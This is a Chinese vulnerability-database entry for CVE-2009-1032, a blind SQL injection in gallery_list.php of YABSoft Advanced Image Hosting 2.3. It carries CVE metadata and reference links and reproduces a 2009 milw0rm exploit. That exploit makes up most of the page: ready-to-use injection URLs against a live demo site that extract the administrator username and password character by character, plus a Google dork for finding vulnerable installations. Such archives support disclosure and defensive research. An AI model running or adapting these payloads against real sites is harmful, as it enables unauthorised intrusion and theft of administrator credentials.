YABSoft Advanced Image Hosting Script 'gallery_list.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117485 漏洞类型 SQL注入
发布时间 2009-03-18 更新时间 2009-04-01
CVE编号 CVE-2009-1032 CNNVD-ID CNNVD-200903-351
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8238
https://cxsecurity.com/issue/WLB-2009030200
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-351
|漏洞详情
YABSoftAdvancedImageHosting(AIH)Script2.3版本的gallery_list.php中存在SQL注入漏洞。远程攻击者可以借助gal参数,执行任意SQL指令。
|漏洞EXP
###################################################################
Advanced Image Hosting (AIH) Remote Blind SQL Injection 
###################################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  Powered by: AIH v2.3
--------------------------------------------------
#[!] Product Name  :  Advanced Image Hosting    
#[!] Product Site  :  http://www.yabsoft.info
#[!] Version       :  v2.3
#[!] Download      :  http://yabsoft.com/aihs-feature.php
###################################################

[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++

First charcter of the username is char(100) -->  char="d"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++

Second charter of the username is char(101) -->  char2="e"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++

Next charter of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++

And The last charter of the username is char(111) --> char4="o"
-------------
Like we see the username is "demo" now you can continue finding another charters for password, changing the number of charters 5,6,7,8,9,10........?>


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2009-03-18]
|参考资料

来源:XF
名称:advancedimage-gallerylist-sql-injection(49316)
链接:http://xforce.iss.net/xforce/xfdb/49316
来源:BID
名称:34176
链接:http://www.securityfocus.com/bid/34176
来源:MILW0RM
名称:8238
链接:http://www.milw0rm.com/exploits/8238
来源:SECUNIA
名称:34366
链接:http://secunia.com/advisories/34366
来源:OSVDB
名称:52813
链接:http://osvdb.org/52813